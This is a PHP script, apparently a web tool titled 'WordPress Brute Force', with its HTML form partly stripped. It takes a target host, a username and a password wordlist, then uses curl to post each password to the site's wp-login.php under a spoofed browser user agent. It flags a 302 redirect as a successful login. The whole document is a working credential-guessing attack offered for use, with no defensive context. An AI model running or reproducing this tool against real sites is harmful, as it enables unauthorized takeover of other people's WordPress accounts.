WordPress Brute Force

Find User ? Click Here

Host:
User:
Wordlist
"); } public function extract_post() { $this->host = $_POST["host"]; $this->user = $_POST["user"]; $this->open = $_POST["lista"]; } public function Xregex() { if(preg_match("@/wp-login.php@", $this->host)) { return true; } else { $this->host = $_POST["host"]."/wp-login.php"; } } public function brute() { $lista = array_filter(explode("\n", $this->open)); foreach($lista as $this->lista) { for($i=0; $i < count($this->lista); $i++) { $this->Xcurl(); } } } private function cool() { echo "[+] Host:"."{$this->host}"; echo "
[+] User:"."{$this->user}"; echo "
[+] Pass:"."{$this->lista}"; } private function Xcurl() { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $this->host); curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/"); $exec = curl_exec($curl); $http = curl_getinfo($curl, CURLINFO_HTTP_CODE); $this->cool(); if($http == 302) { echo "
[+] Success [+] Tinggal Login Aja
"; break; } else { echo "
[+] Failed
"; } curl_close($curl); } } $wp = new cumaiseng(); $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"; $wp->banner(); $wp->extract_post(); $wp->Xregex(); $wp->brute(); ?>